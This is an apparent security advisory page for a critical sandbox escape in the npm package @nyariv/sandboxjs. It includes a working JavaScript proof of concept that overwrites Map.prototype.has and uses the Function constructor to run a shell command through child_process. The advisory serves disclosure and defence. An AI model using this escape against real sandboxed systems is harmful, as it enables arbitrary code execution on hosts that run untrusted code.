GHSA-66h4-qj4x-38xp
Suggest an improvement- Source
- https://github.com/advisories/GHSA-66h4-qj4x-38xp
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-66h4-qj4x-38xp/GHSA-66h4-qj4x-38xp.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-66h4-qj4x-38xp
- Aliases
- Published
- 2026-02-05T21:05:59Z
- Modified
- 2026-02-06T22:22:31.166947Z
- Severity
-
- 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
- Summary
- @nyariv/sandboxjs has a Sandbox Escape vulnerability
- Details
-
Summary
As
Mapis inSAFE_PROTOYPES, it's prototype can be obtained viaMap.prototype. By overwritingMap.prototype.hasthe sandbox can be escaped.Details
This is effectively equivalent to CVE-2026-25142, but without
__lookupGetter__(letwas used during testing), it turns out theletimplementation is bugged:let a = Map.prototype; console.log(a) // undefinedconst a = Map.prototype; console.log(a) // Object [Map] {}let a = 123; console.log(a) // 123const a = 123; console.log(a) // 123PoC
const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` const m = Map.prototype; m.has = isFinite; console.log( isFinite.constructor( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), );`; sb.compile(payload)().run();Impact
Able to set
Map.prototype.has-> RCE - Database specific
{ "github_reviewed_at": "2026-02-05T21:05:59Z", "severity": "CRITICAL", "cwe_ids": [ "CWE-74", "CWE-94" ], "github_reviewed": true, "nvd_published_at": "2026-02-06T20:16:10Z" }- References
Affected packages
npm / @nyariv/sandboxjs
Package
- Name
- @nyariv/sandboxjs
- View open source insights on deps.dev
- Purl
- pkg:npm/%40nyariv/sandboxjs